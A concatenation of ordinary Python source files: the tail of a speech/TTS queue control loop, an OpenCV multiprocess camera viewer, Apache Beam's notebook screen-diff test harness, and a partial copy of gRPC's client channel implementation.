sttcore_proc.daemon = True
sttcore_s.put(runMode )
sttcore_s.put(micDev )
sttcore_s.put(micType )
sttcore_s.put(micGuide)
sttcore_proc.start()
time.sleep(1.00)
sttcore_s.put(['START', ''])
if (ttscore_proc is None):
while (ttscore_s.qsize() > 0):
dummy = ttscore_s.get()
while (ttscore_r.qsize() > 0):
dummy = ttscore_r.get()
ttscore_proc = threading.Thread(target=proc_ttscore, args=(ttscore_s,ttscore_r,))
ttscore_proc.daemon = True
ttscore_s.put(runMode )
ttscore_s.put(micDev )
ttscore_s.put(micType )
ttscore_s.put(micGuide)
ttscore_proc.start()
time.sleep(1.00)
ttscore_s.put(['START', ''])
# processing
if (control_r.qsize() == 0 and control_s.qsize() == 0):
control_s.put(['PROC', ''])
control_pass += 1
else:
control_pass = 0
if (control_pass > 50):
control_s.put(['PASS', ''])
control_pass = 0
break_flag = False
while (control_r.qsize() > 0):
control_get = control_r.get()
control_res = control_get[0]
control_dat = control_get[1]
control_r.task_done()
if (control_res == 'END'):
break_flag = True
if (control_res == 'ERROR'):
break_flag = True
if (break_flag == True):
break
if (sttcore_r.qsize() == 0 and sttcore_s.qsize() == 0):
sttcore_s.put(['PROC', ''])
sttcore_pass += 1
else:
sttcore_pass = 0
if (sttcore_pass > 50):
sttcore_s.put(['PASS', ''])
sttcore_pass = 0
while (sttcore_r.qsize() > 0):
sttcore_get = sttcore_r.get()
sttcore_res = sttcore_get[0]
sttcore_dat = sttcore_get[1]
sttcore_r.task_done()
if (ttscore_r.qsize() == 0 and ttscore_s.qsize() == 0):
ttscore_s.put(['PROC', ''])
ttscore_pass += 1
else:
ttscore_pass = 0
if (ttscore_pass > 50):
ttscore_s.put(['PASS', ''])
ttscore_pass = 0
while (ttscore_r.qsize() > 0):
ttscore_get = ttscore_r.get()
ttscore_res = ttscore_get[0]
ttscore_dat = ttscore_get[1]
ttscore_r.task_done()
time.sleep(0.05)
qLogOutput('')
qLogOutput('___main___:terminate')
try:
control_s.put( [None, None] )
sttcore_s.put( [None, None] )
ttscore_s.put( [None, None] )
time.sleep(3.00)
except:
pass
if (not voice2wav is None):
voice2wav.terminate()
voice2wav = None
if (not playvoice is None):
playvoice.terminate()
playvoice = None
try:
control_proc.join()
sttcore_proc.join()
ttscore_proc.join()
except:
pass
qBusySet(qBusyCtrl, False)
qBusySet(qBusyTTS, False)
qBusySet(qBusySTT, False)
qLogOutput('___main___:bye!')
|
queue_process.py | #!/usr/bin/env python
#-*- coding:utf-8 -*-
# Author: He Ye (Alex)
# Date: 2019-11-13
import argparse
import cv2
import time
from multiprocessing import Process, Queue
VDEV = "/dev/video0"
def showVideoInfo(vhandle):
try:
fps = vhandle.get(cv2.CAP_PROP_FPS)
#count = vhandle.get(cv2.CAP_PROP_FRAME_COUNT)
size = (int(vhandle.get(cv2.CAP_PROP_FRAME_WIDTH)),
int(vhandle.get(cv2.CAP_PROP_FRAME_HEIGHT)))
ret, firstframe = vhandle.read()
if ret:
print("FPS: %.2f" % fps)
#print("COUNT: %.2f" % count)
print("WIDTH: %d" % size[0])
print("HEIGHT: %d" % size[1])
return vhandle, fps, size, firstframe
else:
print("Video can not read!")
except:
"Error in showVideoInfo"
def setVideoInfo(vhandle, fps, width, height):
try:
vhandle.set(cv2.CAP_PROP_FPS, fps)
except:
"Error in setVideoInfo"
def consumer(qf, id):
print("Consumer %d start" %(id))
while True:
#if qf.empty():
# continue
#print("Consumer %d, Frame Queue Size: %d" %(id, qf.qsize()))
frame = qf.get()
if frame is None:
qf.put(None)
break
#print("- Consumer %d, Frame Queue Size: %d" %(id, qf.qsize()))
cv2.imshow(str(id), frame)
cv2.waitKey(1)
#if cv2.waitKey(1) & 0xFF == ord('q'): break
print("Consumer %d quit" %(id))
def producer(cap, qf):
while (True):
ret, frame = cap.read()
cv2.imshow("preview", frame)
rotate_frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)
#cv2.imshow("rotate", rotate_frame)
qf.put(rotate_frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
print("Producer sent stop signal")
qf.put(None)
break
print("Quit producer, Frame Queue Size: %d" %(qf.qsize()))
def main(args):
vdev = args.vdev
thread_number = args.consumers
try:
cap = cv2.VideoCapture(vdev)
except:
"Failed to open" + str(vdev)
showVideoInfo(cap)
qf = Queue(maxsize = 0)
thread_list = []
pt = Process(target = producer, args = (cap, qf,))
thread_list.append(pt)
pt.start()
for i in range(thread_number):
ct = Process(target = consumer, args = (qf, i, ))
thread_list.append(ct)
ct.start()
print("Process numbers = %d" %(len(thread_list)))
for t in thread_list:
t.join()
print("Finished Join")
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--nc", default=2, dest="consumers", help="number of consumer", type=int)
parser.add_argument("--vdev", default=0, dest="vdev", help="video device id (/dev/videoX)", type=int)
args = parser.parse_args()
main(args)
|
screen_diff.py | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Module to conduct screen diff based notebook integration tests."""
# pytype: skip-file
from __future__ import absolute_import
import os
import platform
import threading
import unittest
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import pytest
from apache_beam.runners.interactive import interactive_environment as ie
from apache_beam.runners.interactive.testing.integration import notebook_executor
try:
import chromedriver_binary # pylint: disable=unused-import
from needle.cases import NeedleTestCase
from needle.driver import NeedleChrome
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.ui import WebDriverWait
_interactive_integration_ready = (
notebook_executor._interactive_integration_ready)
except ImportError:
_interactive_integration_ready = False
# Web elements will be rendered differently on different platforms. List all
# supported platforms with goldens here.
_SUPPORTED_PLATFORMS = ['Darwin', 'Linux']
class ScreenDiffIntegrationTestEnvironment(object):
"""A test environment to conduct screen diff integration tests for notebooks.
"""
def __init__(self, test_notebook_path, golden_dir, cleanup=True):
# type: (str, str, bool) -> None
assert _interactive_integration_ready, (
'[interactive_test] dependency is not installed.')
assert os.path.exists(golden_dir), '{} does not exist.'.format(golden_dir)
assert os.path.isdir(golden_dir), '{} is not a directory.'.format(
golden_dir)
self._golden_dir = golden_dir
self._notebook_executor = notebook_executor.NotebookExecutor(
test_notebook_path)
self._cleanup = cleanup
self._test_urls = {}
self._server = None
def __enter__(self):
self._notebook_executor.execute()
self._server = HTTPServer(('', 0), SimpleHTTPRequestHandler)
def start_serving(server):
server.serve_forever()
threading.Thread(
target=start_serving, args=[self._server], daemon=True).start()
for test_id, output_path in\
self._notebook_executor.output_html_paths.items():
self._test_urls[test_id] = self.base_url + output_path
return self
def __exit__(self, exc_type, exc_value, traceback):
if self._notebook_executor and self._cleanup:
self._notebook_executor.cleanup()
if self._server:
def stop_serving(server):
server.shutdown()
threading.Thread(
target=stop_serving, args=[self._server], daemon=True).start()
@property
def base_url(self):
"""The base url where the locally started server serving HTMLs generated by
notebook executions."""
assert self._server, 'Server has not started.'
host_n_port = self._server.server_address
return 'http://{}:{}/'.format(host_n_port[0], host_n_port[1])
@property
def test_urls(self):
"""Mapping from test_id/execution_id to urls serving the output HTML pages
generated by the corresponding notebook executions."""
return self._test_urls
@property
def notebook_path_to_test_id(self):
"""Mapping from input notebook paths to their obfuscated execution/test ids.
"""
return self._notebook_executor.notebook_path_to_execution_id
def should_skip():
"""Whether a screen diff test should be skipped."""
return not (
platform.system() in _SUPPORTED_PLATFORMS and
ie.current_env().is_interactive_ready and _interactive_integration_ready)
if should_skip():
@unittest.skip(
reason='[interactive] and [interactive_test] deps are both required.')
@pytest.mark.skip(
reason='[interactive] and [interactive_test] deps are both required.')
class BaseTestCase(unittest.TestCase):
"""A skipped base test case if interactive_test dependency is not installed.
"""
pass
else:
class BaseTestCase(NeedleTestCase):
"""A base test case to execute screen diff integration tests."""
# Whether the browser should be headless.
_headless = True
def __init__(self, *args, **kwargs):
"""Initializes a test.
Some kwargs that could be configured:
#. golden_dir=<path>. A directory path pointing to all the golden
screenshots as baselines for comparison.
#. test_notebook_dir=<path>. A path pointing to a directory of
notebook files in ipynb format.
#. headless=<True/False>. Whether the browser should be headless when
executing the tests.
#. golden_size=<(int, int)>. The size of the screenshot to take and
compare.
#. cleanup=<True/False>. Whether to clean up the output directory.
Should always be True in automated test environment. When debugging,
turn it False to manually check the output for difference.
#. threshold=<float>. An image difference threshold, when the image
pixel distance is bigger than the value, the test will fail.
"""
golden_root = kwargs.pop(
'golden_dir',
'apache_beam/runners/interactive/testing/integration/goldens')
self._golden_dir = os.path.join(golden_root, platform.system())
self._test_notebook_dir = kwargs.pop(
'test_notebook_dir',
'apache_beam/runners/interactive/testing/integration/test_notebooks')
BaseTestCase._headless = kwargs.pop('headless', True)
self._test_env = None
self._viewport_width, self._viewport_height = kwargs.pop(
'golden_size', (1024, 10000))
self._cleanup = kwargs.pop('cleanup', True)
self._threshold = kwargs.pop('threshold', 5000)
self.baseline_directory = os.path.join(os.getcwd(), self._golden_dir)
self.output_directory = os.path.join(
os.getcwd(), self._test_notebook_dir, 'output')
super(BaseTestCase, self).__init__(*args, **kwargs)
@classmethod
def get_web_driver(cls):
chrome_options = Options()
if cls._headless:
chrome_options.add_argument('--headless')
chrome_options.add_argument('--no-sandbox')
chrome_options.add_argument('--disable-dev-shm-usage')
chrome_options.add_argument('--force-color-profile=srgb')
return NeedleChrome(options=chrome_options)
def setUp(self):
self.set_viewport_size(self._viewport_width, self._viewport_height)
def run(self, result=None):
with ScreenDiffIntegrationTestEnvironment(self._test_notebook_dir,
self._golden_dir,
self._cleanup) as test_env:
self._test_env = test_env
super(BaseTestCase, self).run(result)
def explicit_wait(self):
"""Wait for common elements to be visible."""
WebDriverWait(self.driver, 5).until(
expected_conditions.visibility_of_element_located(
(By.TAG_NAME, 'facets-overview')))
WebDriverWait(self.driver, 5).until(
expected_conditions.visibility_of_element_located(
(By.TAG_NAME, 'facets-dive')))
def assert_all(self):
"""Asserts screenshots for all notebooks in the test_notebook_path."""
for test_id, test_url in self._test_env.test_urls.items():
self.driver.get(test_url)
self.explicit_wait()
self.assertScreenshot('body', test_id, self._threshold)
def assert_single(self, test_id):
"""Asserts the screenshot for a single test. The given test id will be the
name of the golden screenshot."""
test_url = self._test_env.test_urls.get(test_id, None)
assert test_url, '{} is not a valid test id.'.format(test_id)
self.driver.get(test_url)
self.explicit_wait()
self.assertScreenshot('body', test_id, self._threshold)
def assert_notebook(self, notebook_name):
"""Asserts the screenshot for a single notebook. The notebook with the
given notebook_name under test_notebook_dir will be executed and asserted.
"""
if not notebook_name.endswith('.ipynb'):
notebook_name += '.ipynb'
notebook_path = os.path.join(self._test_notebook_dir, notebook_name)
test_id = self._test_env.notebook_path_to_test_id.get(notebook_path, None)
assert test_id, 'Cannot find notebook with name {}.'.format(notebook_name)
self.assert_single(test_id)
# This file contains no tests. Below lines are purely for passing lint.
if __name__ == '__main__':
unittest.main()
|
_channel.py | # Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Invocation-side implementation of gRPC Python."""
import functools
import logging
import sys
import threading
import time
import grpc
from grpc import _compression
from grpc import _common
from grpc import _grpcio_metadata
from grpc._cython import cygrpc
_LOGGER = logging.getLogger(__name__)
_USER_AGENT = 'grpc-python/{}'.format(_grpcio_metadata.__version__)
_EMPTY_FLAGS = 0
_UNARY_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_UNARY_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.send_message,
cygrpc.OperationType.send_close_from_client,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_UNARY_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_message,
cygrpc.OperationType.receive_status_on_client,
)
_STREAM_STREAM_INITIAL_DUE = (
cygrpc.OperationType.send_initial_metadata,
cygrpc.OperationType.receive_initial_metadata,
cygrpc.OperationType.receive_status_on_client,
)
_CHANNEL_SUBSCRIPTION_CALLBACK_ERROR_LOG_MESSAGE = (
'Exception calling channel subscription callback!')
_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'>')
_NON_OK_RENDEZVOUS_REPR_FORMAT = ('<_Rendezvous of RPC that terminated with:\n'
'\tstatus = {}\n'
'\tdetails = "{}"\n'
'\tdebug_error_string = "{}"\n'
'>')
def _deadline(timeout):
return None if timeout is None else time.time() + timeout
def _unknown_code_details(unknown_cygrpc_code, details):
return 'Server sent unknown code {} and details "{}"'.format(
unknown_cygrpc_code, details)
class _RPCState(object):
def __init__(self, due, initial_metadata, trailing_metadata, code, details):
self.condition = threading.Condition()
# The cygrpc.OperationType objects representing events due from the RPC's
# completion queue.
self.due = set(due)
self.initial_metadata = initial_metadata
self.response = None
self.trailing_metadata = trailing_metadata
self.code = code
self.details = details
self.debug_error_string = None
# The semantics of grpc.Future.cancel and grpc.Future.cancelled are
# slightly wonky, so they have to be tracked separately from the rest of the
# result of the RPC. This field tracks whether cancellation was requested
# prior to termination of the RPC.
self.cancelled = False
self.callbacks = []
self.fork_epoch = cygrpc.get_fork_epoch()
def reset_postfork_child(self):
self.condition = threading.Condition()
def _abort(state, code, details):
if state.code is None:
state.code = code
state.details = details
if state.initial_metadata is None:
state.initial_metadata = ()
state.trailing_metadata = ()
def _handle_event(event, state, response_deserializer):
callbacks = []
for batch_operation in event.batch_operations:
operation_type = batch_operation.type()
state.due.remove(operation_type)
if operation_type == cygrpc.OperationType.receive_initial_metadata:
state.initial_metadata = batch_operation.initial_metadata()
elif operation_type == cygrpc.OperationType.receive_message:
serialized_response = batch_operation.message()
if serialized_response is not None:
response = _common.deserialize(serialized_response,
response_deserializer)
if response is None:
details = 'Exception deserializing response!'
_abort(state, grpc.StatusCode.INTERNAL, details)
else:
state.response = response
elif operation_type == cygrpc.OperationType.receive_status_on_client:
state.trailing_metadata = batch_operation.trailing_metadata()
if state.code is None:
code = _common.CYGRPC_STATUS_CODE_TO_STATUS_CODE.get(
batch_operation.code())
if code is None:
state.code = grpc.StatusCode.UNKNOWN
state.details = _unknown_code_details(
code, batch_operation.details())
else:
state.code = code
state.details = batch_operation.details()
state.debug_error_string = batch_operation.error_string()
callbacks.extend(state.callbacks)
state.callbacks = None
return callbacks
def _event_handler(state, response_deserializer):
def handle_event(event):
with state.condition:
callbacks = _handle_event(event, state, response_deserializer)
state.condition.notify_all()
done = not state.due
for callback in callbacks:
callback()
return done and state.fork_epoch >= cygrpc.get_fork_epoch()
return handle_event
#pylint: disable=too-many-statements
def _consume_request_iterator(request_iterator, state, call, request_serializer,
event_handler):
"""Consume a request iterator supplied by the user."""
def consume_request_iterator(): # pylint: disable=too-many-branches
# Iterate over the request iterator until it is exhausted or an error
# condition is encountered.
while True:
return_from_user_request_generator_invoked = False
try:
# The thread may die in user-code. Do not block fork for this.
cygrpc.enter_user_request_generator()
request = next(request_iterator)
except StopIteration:
break
except Exception: # pylint: disable=broad-except
cygrpc.return_from_user_request_generator()
return_from_user_request_generator_invoked = True
code = grpc.StatusCode.UNKNOWN
details = 'Exception iterating requests!'
_LOGGER.exception(details)
call.cancel(_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
finally:
if not return_from_user_request_generator_invoked:
cygrpc.return_from_user_request_generator()
serialized_request = _common.serialize(request, request_serializer)
with state.condition:
if state.code is None and not state.cancelled:
if serialized_request is None:
code = grpc.StatusCode.INTERNAL
details = 'Exception serializing request!'
call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code],
details)
_abort(state, code, details)
return
else:
operations = (cygrpc.SendMessageOperation(
serialized_request, _EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_message)
else:
return
def _done():
return (state.code is not None or
cygrpc.OperationType.send_message not in
state.due)
_common.wait(
state.condition.wait,
_done,
spin_cb=functools.partial(
cygrpc.block_if_fork_in_progress, state))
if state.code is not None:
return
else:
return
with state.condition:
if state.code is None:
operations = (
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),)
operating = call.operate(operations, event_handler)
if operating:
state.due.add(cygrpc.OperationType.send_close_from_client)
consumption_thread = cygrpc.ForkManagedThread(
target=consume_request_iterator)
consumption_thread.setDaemon(True)
consumption_thread.start()
class _Rendezvous(grpc.RpcError, grpc.Future, grpc.Call): # pylint: disable=too-many-ancestors
def __init__(self, state, call, response_deserializer, deadline):
super(_Rendezvous, self).__init__()
self._state = state
self._call = call
self._response_deserializer = response_deserializer
self._deadline = deadline
def cancel(self):
with self._state.condition:
if self._state.code is None:
code = grpc.StatusCode.CANCELLED
details = 'Locally cancelled by application!'
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[code], details)
self._state.cancelled = True
_abort(self._state, code, details)
self._state.condition.notify_all()
return False
def cancelled(self):
with self._state.condition:
return self._state.cancelled
def running(self):
with self._state.condition:
return self._state.code is None
def done(self):
with self._state.condition:
return self._state.code is not None
def _is_complete(self):
return self._state.code is not None
def result(self, timeout=None):
"""Returns the result of the computation or raises its exception.
See grpc.Future.result for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(
self._state.condition.wait, self._is_complete, timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return self._state.response
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
raise self
def exception(self, timeout=None):
"""Return the exception raised by the computation.
See grpc.Future.exception for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(
self._state.condition.wait, self._is_complete, timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
return self
def traceback(self, timeout=None):
"""Access the traceback of the exception raised by the computation.
See grpc.future.traceback for the full API contract.
"""
with self._state.condition:
timed_out = _common.wait(
self._state.condition.wait, self._is_complete, timeout=timeout)
if timed_out:
raise grpc.FutureTimeoutError()
else:
if self._state.code is grpc.StatusCode.OK:
return None
elif self._state.cancelled:
raise grpc.FutureCancelledError()
else:
try:
raise self
except grpc.RpcError:
return sys.exc_info()[2]
def add_done_callback(self, fn):
with self._state.condition:
if self._state.code is None:
self._state.callbacks.append(lambda: fn(self))
return
fn(self)
def _next(self):
with self._state.condition:
if self._state.code is None:
event_handler = _event_handler(self._state,
self._response_deserializer)
operating = self._call.operate(
(cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),),
event_handler)
if operating:
self._state.due.add(cygrpc.OperationType.receive_message)
elif self._state.code is grpc.StatusCode.OK:
raise StopIteration()
else:
raise self
def _response_ready():
return (
self._state.response is not None or
(cygrpc.OperationType.receive_message not in self._state.due
and self._state.code is not None))
_common.wait(self._state.condition.wait, _response_ready)
if self._state.response is not None:
response = self._state.response
self._state.response = None
return response
elif cygrpc.OperationType.receive_message not in self._state.due:
if self._state.code is grpc.StatusCode.OK:
raise StopIteration()
elif self._state.code is not None:
raise self
def __iter__(self):
return self
def __next__(self):
return self._next()
def next(self):
return self._next()
def is_active(self):
with self._state.condition:
return self._state.code is None
def time_remaining(self):
if self._deadline is None:
return None
else:
return max(self._deadline - time.time(), 0)
def add_callback(self, callback):
with self._state.condition:
if self._state.callbacks is None:
return False
else:
self._state.callbacks.append(callback)
return True
def initial_metadata(self):
with self._state.condition:
def _done():
return self._state.initial_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.initial_metadata
def trailing_metadata(self):
with self._state.condition:
def _done():
return self._state.trailing_metadata is not None
_common.wait(self._state.condition.wait, _done)
return self._state.trailing_metadata
def code(self):
with self._state.condition:
def _done():
return self._state.code is not None
_common.wait(self._state.condition.wait, _done)
return self._state.code
def details(self):
with self._state.condition:
def _done():
return self._state.details is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.details)
def debug_error_string(self):
with self._state.condition:
def _done():
return self._state.debug_error_string is not None
_common.wait(self._state.condition.wait, _done)
return _common.decode(self._state.debug_error_string)
def _repr(self):
with self._state.condition:
if self._state.code is None:
return '<_Rendezvous object of in-flight RPC>'
elif self._state.code is grpc.StatusCode.OK:
return _OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details)
else:
return _NON_OK_RENDEZVOUS_REPR_FORMAT.format(
self._state.code, self._state.details,
self._state.debug_error_string)
def __repr__(self):
return self._repr()
def __str__(self):
return self._repr()
def __del__(self):
with self._state.condition:
if self._state.code is None:
self._state.code = grpc.StatusCode.CANCELLED
self._state.details = 'Cancelled upon garbage collection!'
self._state.cancelled = True
self._call.cancel(
_common.STATUS_CODE_TO_CYGRPC_STATUS_CODE[self._state.code],
self._state.details)
self._state.condition.notify_all()
def _start_unary_request(request, timeout, request_serializer):
deadline = _deadline(timeout)
serialized_request = _common.serialize(request, request_serializer)
if serialized_request is None:
state = _RPCState((), (), (), grpc.StatusCode.INTERNAL,
'Exception serializing request!')
rendezvous = _Rendezvous(state, None, None, deadline)
return deadline, None, rendezvous
else:
return deadline, serialized_request, None
def _end_unary_response_blocking(state, call, with_call, deadline):
if state.code is grpc.StatusCode.OK:
if with_call:
rendezvous = _Rendezvous(state, call, None, deadline)
return state.response, rendezvous
else:
return state.response
else:
raise _Rendezvous(state, None, None, deadline)
def _stream_unary_invocation_operationses(metadata, initial_metadata_flags):
return (
(
cygrpc.SendInitialMetadataOperation(metadata,
initial_metadata_flags),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
def _stream_unary_invocation_operationses_and_tags(metadata,
initial_metadata_flags):
return tuple((
operations,
None,
)
for operations in _stream_unary_invocation_operationses(
metadata, initial_metadata_flags))
def _determine_deadline(user_deadline):
parent_deadline = cygrpc.get_deadline_from_context()
if parent_deadline is None and user_deadline is None:
return None
elif parent_deadline is not None and user_deadline is None:
return parent_deadline
elif user_deadline is not None and parent_deadline is None:
return user_deadline
else:
return min(parent_deadline, user_deadline)
class _UnaryUnaryMultiCallable(grpc.UnaryUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _prepare(self, request, timeout, metadata, wait_for_ready, compression):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
if serialized_request is None:
return None, None, None, rendezvous
else:
state = _RPCState(_UNARY_UNARY_INITIAL_DUE, None, None, None, None)
operations = (
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request, _EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),
cygrpc.ReceiveMessageOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
)
return state, operations, deadline, None
def _blocking(self, request, timeout, metadata, credentials, wait_for_ready,
compression):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else credentials._credentials, ((
operations,
None,
),), self._context)
event = call.next_event()
_handle_event(event, state, self._response_deserializer)
return state, call
def __call__(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request, timeout, metadata, credentials,
wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, operations, deadline, rendezvous = self._prepare(
request, timeout, metadata, wait_for_ready, compression)
if state is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
event_handler = _event_handler(state, self._response_deserializer)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, deadline, metadata, None
if credentials is None else credentials._credentials,
(operations,), event_handler, self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _UnaryStreamMultiCallable(grpc.UnaryStreamMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def __call__( # pylint: disable=too-many-locals
self,
request,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline, serialized_request, rendezvous = _start_unary_request(
request, timeout, self._request_serializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
if serialized_request is None:
raise rendezvous # pylint: disable-msg=raising-bad-type
else:
augmented_metadata = _compression.augment_metadata(
metadata, compression)
state = _RPCState(_UNARY_STREAM_INITIAL_DUE, None, None, None, None)
operationses = (
(
cygrpc.SendInitialMetadataOperation(augmented_metadata,
initial_metadata_flags),
cygrpc.SendMessageOperation(serialized_request,
_EMPTY_FLAGS),
cygrpc.SendCloseFromClientOperation(_EMPTY_FLAGS),
cygrpc.ReceiveStatusOnClientOperation(_EMPTY_FLAGS),
),
(cygrpc.ReceiveInitialMetadataOperation(_EMPTY_FLAGS),),
)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS,
self._method, None, _determine_deadline(deadline), metadata,
None if credentials is None else
credentials._credentials, operationses,
_event_handler(state,
self._response_deserializer), self._context)
return _Rendezvous(state, call, self._response_deserializer,
deadline)
class _StreamUnaryMultiCallable(grpc.StreamUnaryMultiCallable):
# pylint: disable=too-many-arguments
def __init__(self, channel, managed_call, method, request_serializer,
response_deserializer):
self._channel = channel
self._managed_call = managed_call
self._method = method
self._request_serializer = request_serializer
self._response_deserializer = response_deserializer
self._context = cygrpc.build_census_context()
def _blocking(self, request_iterator, timeout, metadata, credentials,
wait_for_ready, compression):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._channel.segregated_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, _determine_deadline(deadline), augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses_and_tags(
augmented_metadata, initial_metadata_flags), self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, None)
while True:
event = call.next_event()
with state.condition:
_handle_event(event, state, self._response_deserializer)
state.condition.notify_all()
if not state.due:
break
return state, call
def __call__(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, False, None)
def with_call(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
state, call, = self._blocking(request_iterator, timeout, metadata,
credentials, wait_for_ready, compression)
return _end_unary_response_blocking(state, call, True, None)
def future(self,
request_iterator,
timeout=None,
metadata=None,
credentials=None,
wait_for_ready=None,
compression=None):
deadline = _deadline(timeout)
state = _RPCState(_STREAM_UNARY_INITIAL_DUE, None, None, None, None)
event_handler = _event_handler(state, self._response_deserializer)
initial_metadata_flags = _InitialMetadataFlags().with_wait_for_ready(
wait_for_ready)
augmented_metadata = _compression.augment_metadata(
metadata, compression)
call = self._managed_call(
cygrpc.PropagationConstants.GRPC_PROPAGATE_DEFAULTS, self._method,
None, deadline, augmented_metadata, None
if credentials is None else credentials._credentials,
_stream_unary_invocation_operationses(
metadata, initial_metadata_flags), event_handler, self._context)
_consume_request_iterator(request_iterator, state, call,
self._request_serializer, event_handler)
